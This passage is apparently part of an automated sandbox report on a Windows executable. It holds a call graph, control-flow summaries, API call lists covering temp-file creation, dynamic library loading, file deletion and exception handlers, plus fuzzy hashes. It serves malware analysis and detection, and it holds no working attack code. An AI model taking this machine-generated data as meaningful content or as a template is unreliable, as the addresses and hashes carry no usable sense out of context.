9876->10481 9878 140003fe3 10482 1400121c0 GetLastError TlsGetValue SetLastError 9878->10482 9880 140003ff7 9881 140007e50 5 API calls 9880->9881 9882 14000401c 9881->9882 9883 140012210 3 API calls 9882->9883 9883->9853 9899->9119 9900->9121 9902 1400126d0 3 API calls 9901->9902 9903 140004868 9902->9903 9903->9124 9904->9127 9905->9131 9907 1400123e0 21 API calls 9906->9907 9908 140003527 9907->9908 9908->9154 9909->9164 9910->9168 9911->9172 9912->9176 9914 14000caa8 9913->9914 9915 14000ca00 9913->9915 9916 1400126d0 3 API calls 9914->9916 9918 1400126d0 3 API calls 9915->9918 9917 14000cac5 9916->9917 10021 140012900 TlsGetValue 9917->10021 9919 14000ca34 9918->9919 9922 14000ca3b memmove 9919->9922 9923 14000ca4c 9919->9923 9921 14000caf1 9921->9180 9922->9923 9923->9180 9924->9184 9927 140007f00 9925->9927 9926 140012630 TlsGetValue 9928 140007fa9 9926->9928 9927->9926 9929 1400126d0 3 API calls 9928->9929 9930 140007fb7 9929->9930 9931 140002d0e 9930->9931 10022 140012850 TlsGetValue 9930->10022 9931->9189 9933->9193 9934->9195 9935->9197 9936->9199 9937->9203 9938->9209 9939->9211 9940->9213 9941->9215 9943 140007644 TlsGetValue 9942->9943 9950 140007501 9942->9950 9943->9217 9945 140012630 TlsGetValue 9947 1400075a6 9945->9947 9946 140007560 wcsncmp 9946->9950 9948 1400075ca 9947->9948 10023 1400126a0 TlsGetValue 9947->10023 9952 1400126d0 3 API calls 9948->9952 9949 140007592 9949->9945 9950->9946 9950->9949 9954 1400075d4 9952->9954 9953 1400075b9 memmove 9953->9948 9955 1400075ee 9954->9955 9956 1400075e0 wcsncpy 9954->9956 9955->9217 9956->9955 9957->9219 9958->9221 9959->9223 9960->9227 9961->9229 10024 14000b5d8 9962->10024 9964 14000b790 9965 14000b5d8 2 API calls 9964->9965 9966 14000b79b 9965->9966 9967 14000b5d8 2 API calls 9966->9967 9968 14000b7a6 9967->9968 9969 14000b7b2 GetStockObject 9968->9969 9970 14000b7c3 LoadIconW LoadCursorW RegisterClassExW 9968->9970 9969->9970 10027 14000be5c GetForegroundWindow 9970->10027 9975 14000b859 
[Execution graph: rendered as an image in the original report; its flattened Graphviz node/edge list is not reproduced here. Nodes are code addresses inside the 0x140000000 module and edges are call/control-flow transitions. Windows API calls appearing on the graph's nodes: window and message handling (IsWindowEnabled, EnableWindow, GetSystemMetrics, CreateWindowExW, SendMessageW, CreateAcceleratorTableW, TranslateAcceleratorW, DestroyAcceleratorTable, SetForegroundWindow, BringWindowToTop, SetWindowPos, EnumWindows, GetWindowThreadProcessId, GetMessageW, TranslateMessage, DispatchMessageW, MessageBoxW); process, thread and error state (GetCurrentProcessId, GetCurrentThreadId, GetLastError, SetLastError, TlsGetValue, EnterCriticalSection, LeaveCriticalSection, Sleep, timeBeginPeriod); dynamic API resolution (LoadLibraryW, GetProcAddress, FreeLibrary); file, path and environment handling (GetTempPathW, GetTempFileNameW, GetLongPathNameW, CreateFileW, WriteFile, CloseHandle, SetFilePointer, DeleteFileW, SetFileAttributesW, CreateDirectoryW, SetCurrentDirectoryW, FindResourceW, SHGetFolderLocation, SHGetPathFromIDListW, GetCommandLineW, PathRemoveArgsW, SetEnvironmentVariableW, CoInitialize, CoTaskMemFree); heap and string routines (HeapAlloc, HeapReAlloc, HeapFree, memset, memmove, wcslen, wcscpy, wcsncpy, wcscat, wcscmp, _wcsdup, free, tolower, MultiByteToWideChar, WideCharToMultiByte).]

                                      Control-flow Graph

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: LibraryPath$AddressAllocFreeHeapLoadLongNameProcTempValue
                                      • String ID: GetLongPathNameW$Kernel32.DLL
                                      • API String ID: 820969696-2943376620
                                      • Opcode ID: c3e4c02f6cb4c0a015bd45f3fcc7f186f913e40d0dd92e763cbbe5d307640fc6
                                      • Instruction ID: 230e630dded4efaa915c31c3904b5b857ecb3aa047886c8d585020238d201ac5
                                      • Opcode Fuzzy Hash: c3e4c02f6cb4c0a015bd45f3fcc7f186f913e40d0dd92e763cbbe5d307640fc6
                                      • Instruction Fuzzy Hash: 74116D3171074086EF159F27A9443A967A5FB8CFC0F481029FF4E4B7A5DE39C4518340

                                      Control-flow Graph

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: File$NameTemp$Heap$AllocErrorLastPathValue$AttributesBackslashCreateDeleteDirectoryExtensionFreeRenamememmovewcslenwcsncpy
                                      • String ID:
                                      • API String ID: 4232179356-0
                                      • Opcode ID: 30cb002adb08c8c9ee0a6baba99c0a0f0998ecb4b16737804f1fb03ce3a8d9fe
                                      • Instruction ID: 77aa1fd205ec2d48eabb088ee49ef1dd4fb6b524f1726a3c9e39dbd98a5b5f3b
                                      • Opcode Fuzzy Hash: 30cb002adb08c8c9ee0a6baba99c0a0f0998ecb4b16737804f1fb03ce3a8d9fe
                                      • Instruction Fuzzy Hash: 138162FBE69644E5EA07B763BC46BED5220D3AD3D4F504410FF08062A3EE3995EA4B10

                                      Control-flow Graph

                                      [Control-flow graph of the function at 0x14000de50 (basic blocks 0x14000de50-0x14000e09b), rendered as an image in the original report with executed and not-executed blocks colour-coded. API calls in the function body: CreateFileW (four call sites), HeapAlloc, SetFilePointer; internal calls to 0x1400112a8 and 0x1400111dc.]
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: File$Create$CriticalSection$AllocEnterHeapLeavePointer
                                      • String ID:
                                      • API String ID: 2685021396-0
                                      • Opcode ID: 90872b3e34ccf7d1475fd6165b8231d8d7d244be71cfa9b75e83e52ddb76e0bc
                                      • Instruction ID: 19dccfeb25466122eda91520b9d3e1282c027ca6efa307134c14a125255dccfb
                                      • Opcode Fuzzy Hash: 90872b3e34ccf7d1475fd6165b8231d8d7d244be71cfa9b75e83e52ddb76e0bc
                                      • Instruction Fuzzy Hash: CA51B1B261469086E761CF17F9007AA7690B39CBE4F04873AFF6A47BE4DB79C4419B10

                                      Control-flow Graph

                                      [Control-flow graph of the function at 0x14000593c (basic blocks 0x14000593c-0x1400067a9), rendered as an image in the original report with executed and not-executed blocks colour-coded. API calls in the function body: GetModuleHandleW, PathRemoveBackslashW, PathQuoteSpacesW (two call sites). The body consists largely of repeated call sequences to internal helpers (0x1400121c0, 0x140007c90, 0x140012210, 0x140012450 and others), followed by calls to 0x140003cc9, 0x14000c45c, 0x140006a58, 0x140003ddc, 0x140007284, 0x14000daa8, 0x1400029c8, 0x140002930 and ten HeapFree wrapper calls (0x140012360) at the end.]
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: Value$HeapPath$AllocCriticalErrorLastQuoteSectionSpaces$BackslashCharCreateEnterEnvironmentFileFreeHandleLeaveModuleNameRemoveTempThreadUpperVariablewcslen
                                      • String ID:
                                      • API String ID: 2499486723-0
                                      • Opcode ID: 2a27bf2c4694b33070e05cd964385f6fd582395640ee0e109cac132e63eb8708
                                      • Instruction ID: 8b331e692c67017886d6c7239b17c9f9d27d3c51ffaf72a1bb59c68ee6c0545e
                                      • Opcode Fuzzy Hash: 2a27bf2c4694b33070e05cd964385f6fd582395640ee0e109cac132e63eb8708
                                      • Instruction Fuzzy Hash: 83723BB6E25548D6EA16B7B7B8877E91220A3AD394F500411FF4C0B363EE39C5F64B10

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: FilePointermemmove
                                      • String ID:
                                      • API String ID: 2366752189-0
                                      • Opcode ID: b4f1478b6fdc608b573b2d6bb241fddc82556d2816959310d2dbf51914ce2f41
                                      • Instruction ID: b9f44d82ba4cb6c24f152d63ce96d8852f082d92484b54d7365d071901ec84b9
                                      • Opcode Fuzzy Hash: b4f1478b6fdc608b573b2d6bb241fddc82556d2816959310d2dbf51914ce2f41
                                      • Instruction Fuzzy Hash: 7541837770468086DB01CF7AF1402ADF7A4EB98BD9F084426EF4C43BA5DA39C591CB50

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: FileWrite$FreeHeap
                                      • String ID:
                                      • API String ID: 74418370-0
                                      • Opcode ID: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
                                      • Instruction ID: 9d08b72cfe526555b527e3d6fc60fa1eae748afb3cf0625e1a419d858907832f
                                      • Opcode Fuzzy Hash: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
                                      • Instruction Fuzzy Hash: 43317EB2205A8082EB22DF16E0453A9B7B0F789BD4F548515EB59577F4DF3EC488CB00

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: CreateDirectorywcslenwcsncpy
                                      • String ID:
                                      • API String ID: 961886536-0
                                      • Opcode ID: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
                                      • Instruction ID: 5f5e6732187473c7e9a992da28a106256b0abf82a063e4d7cd37b44a9c7c83f6
                                      • Opcode Fuzzy Hash: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
                                      • Instruction Fuzzy Hash: 100188A621264191EF72DB65E0643E9B350F78C7C4F804523FB8D036A8EE3DC645CB14

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: CommonControlsInitInitializememset
                                      • String ID:
                                      • API String ID: 2179856907-0
                                      • Opcode ID: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
                                      • Instruction ID: 449a974473b47bcf77cc2e9d1d873e7016711834fb404a36d393ff203d460c1f
                                      • Opcode Fuzzy Hash: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
                                      • Instruction Fuzzy Hash: E0E0E27263658092E785EB22E8857AEB260FB88748FC06105F38B469A5CF3DC659CF00

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: AllocHeap$Value
                                      • String ID:
                                      • API String ID: 3898337583-0
                                      • Opcode ID: 988988ada6dc82bff9e9c7669f10d32680ca5bffd2b02ccc7cf7ef26e6a306a8
                                      • Instruction ID: 7cab8ebf5e8be7cca61280ad2f22e4d1c3948fe97e6d3aaf46f0ca18481b9e55
                                      • Opcode Fuzzy Hash: 988988ada6dc82bff9e9c7669f10d32680ca5bffd2b02ccc7cf7ef26e6a306a8
                                      • Instruction Fuzzy Hash: E7317336609B4486DB21CB5AE49035AB7A0F7CCBE8F144216EB8D47B78DF79C691CB40

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: AllocHeap$Value
                                      • String ID:
                                      • API String ID: 3898337583-0
                                      • Opcode ID: 30ed22d9c32a89c2cfd42ea85ebcc15196c91459ae3e4d92826612402d9637be
                                      • Instruction ID: c44eb9ef2cf98d3488e4d96c7e244cbf8e5b64558ad0ce04898d2a75112beb9a
                                      • Opcode Fuzzy Hash: 30ed22d9c32a89c2cfd42ea85ebcc15196c91459ae3e4d92826612402d9637be
                                      • Instruction Fuzzy Hash: 1521A336609B40C6DA25CB5AE89136AB7A1F7CDBD4F108126EB8D87B38DF3DC5518B00

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: CodeExitProcess
                                      • String ID: open
                                      • API String ID: 3861947596-2758837156
                                      • Opcode ID: 687e6c2363dd86eb31bb0a35d986b928b7956615258b23a1130e50283f5f7496
                                      • Instruction ID: 9a8e33d82e51c75021cc1a1bc422673ad63e4121514530fd256563005765fdb1
                                      • Opcode Fuzzy Hash: 687e6c2363dd86eb31bb0a35d986b928b7956615258b23a1130e50283f5f7496
                                      • Instruction Fuzzy Hash: 6C315E73A19A84D9DA619B6AF8417EE6364F388784F404415FF8D07B6ADF3CC2958B40

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0000000140012060: HeapCreate.KERNEL32 ref: 000000014001206E
                                        • Part of subcall function 0000000140012060: TlsAlloc.KERNEL32 ref: 000000014001207B
                                        • Part of subcall function 000000014000C980: HeapCreate.KERNEL32 ref: 000000014000C98E
                                        • Part of subcall function 000000014000B538: memset.MSVCRT ref: 000000014000B547
                                        • Part of subcall function 000000014000B538: InitCommonControlsEx.COMCTL32 ref: 000000014000B561
                                        • Part of subcall function 000000014000B538: CoInitialize.OLE32 ref: 000000014000B569
                                        • Part of subcall function 00000001400120D0: HeapAlloc.KERNEL32 ref: 0000000140012123
                                        • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CD11
                                        • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CD42
                                        • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CDB2
                                        • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D56E
                                        • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D58F
                                        • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D5A1
                                        • Part of subcall function 000000014000D444: HeapAlloc.KERNEL32 ref: 000000014000D476
                                        • Part of subcall function 000000014000D444: HeapAlloc.KERNEL32 ref: 000000014000D491
                                        • Part of subcall function 0000000140011D30: HeapAlloc.KERNEL32 ref: 0000000140011D82
                                        • Part of subcall function 0000000140011D30: memset.MSVCRT ref: 0000000140011DB6
                                        • Part of subcall function 00000001400120D0: HeapReAlloc.KERNEL32 ref: 0000000140012151
                                        • Part of subcall function 00000001400120D0: HeapFree.KERNEL32 ref: 0000000140012194
                                        • Part of subcall function 000000014000C4D0: RemoveVectoredExceptionHandler.KERNEL32 ref: 000000014000C8A5
                                        • Part of subcall function 000000014000C4D0: AddVectoredExceptionHandler.KERNEL32 ref: 000000014000C8C0
                                        • Part of subcall function 00000001400121C0: GetLastError.KERNEL32 ref: 00000001400121C4
                                        • Part of subcall function 00000001400121C0: TlsGetValue.KERNEL32 ref: 00000001400121D4
                                        • Part of subcall function 00000001400121C0: SetLastError.KERNEL32 ref: 00000001400121F1
                                        • Part of subcall function 0000000140012210: TlsGetValue.KERNEL32 ref: 0000000140012223
                                        • Part of subcall function 0000000140012210: HeapAlloc.KERNEL32 ref: 0000000140012266
                                      • HeapDestroy.KERNEL32 ref: 000000014000124C
                                      • ExitProcess.KERNEL32 ref: 0000000140001258
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: Heap$Alloc$Free$CreateErrorExceptionHandlerLastValueVectoredmemset$CommonControlsDestroyExitInitInitializeProcessRemove
                                      • String ID:
                                      • API String ID: 1207063833-0
                                      • Opcode ID: 2b686c560d3d7e8cf0c1b5237d022b828fa0a0875916c3199546faae0b532a26
                                      • Instruction ID: d53a403d2731d7f4be2c1c63aa8517eaadbba994f78fcf95756ff457d5608e18
                                      • Opcode Fuzzy Hash: 2b686c560d3d7e8cf0c1b5237d022b828fa0a0875916c3199546faae0b532a26
                                      • Instruction Fuzzy Hash: 1951F6F0A11A4481FA03F7A3F8537E926159B9D7D4F808129BF1D1B2F3DD3A85558B22

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: ExceptionHandlerVectored$Remove
                                      • String ID:
                                      • API String ID: 3670940754-0
                                      • Opcode ID: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
                                      • Instruction ID: 54ed52b0d94e107c171475cce83a86a7777a808cb3853d4771323e3d57a36066
                                      • Opcode Fuzzy Hash: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
                                      • Instruction Fuzzy Hash: 8AF0ED7061370485FE5BDB93B8987F472A0AB4C7C0F184029BB49076719F3C88A48348

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: File$AttributesDelete
                                      • String ID:
                                      • API String ID: 2910425767-0
                                      • Opcode ID: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
                                      • Instruction ID: adf2a79140fabccb03c20fd21f07aa3af446659453137af282c5310bbe8ffc9f
                                      • Opcode Fuzzy Hash: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
                                      • Instruction Fuzzy Hash: 48E05BB471910195FB6BD7A778153F521419F8D7D1F184121AB42071B0EF3D44C55222

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: AllocHeap$CreateValue
                                      • String ID:
                                      • API String ID: 493873155-0
                                      • Opcode ID: 1b0d72df29ce6564ac22208b59af7006679a658f7d576f5e4767aae600ecf03e
                                      • Instruction ID: 1c20f48a7e0d63c5f07c3edeff385a7070e23dcbb2ee76a36a736f2f2e91a8b3
                                      • Opcode Fuzzy Hash: 1b0d72df29ce6564ac22208b59af7006679a658f7d576f5e4767aae600ecf03e
                                      • Instruction Fuzzy Hash: F9D0C939A1175092E746AB72A81A3E922A0F75C3C1F901419B70947771DF7E81965A40
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: Heap$AllocFreememset
                                      • String ID:
                                      • API String ID: 3063399779-0
                                      • Opcode ID: a0cc480958914a5b96af09c049cabf50404750236a51b526bc810001df406aed
                                      • Instruction ID: a75182db50c1f984f89b78753495ac0ab196a1c9ad642d63c8067afd0bb8a22e
                                      • Opcode Fuzzy Hash: a0cc480958914a5b96af09c049cabf50404750236a51b526bc810001df406aed
                                      • Instruction Fuzzy Hash: 12213B32605B5086EA1ADB53BC4179AA6A8F7C8FD0F498025AF584BB66DE79C852C340
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: CloseFreeHandleHeap
                                      • String ID:
                                      • API String ID: 1642312469-0
                                      • Opcode ID: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
                                      • Instruction ID: 5f93da8337f86b39695cad05c5aa1bbbcf0731d39a623fe836b1511b3ba38e21
                                      • Opcode Fuzzy Hash: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
                                      • Instruction Fuzzy Hash: AD01FB71614A4081EA56EBA7F5543E96391ABCDBE0F445216BB2E4B7F6DE38C4808740
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmp
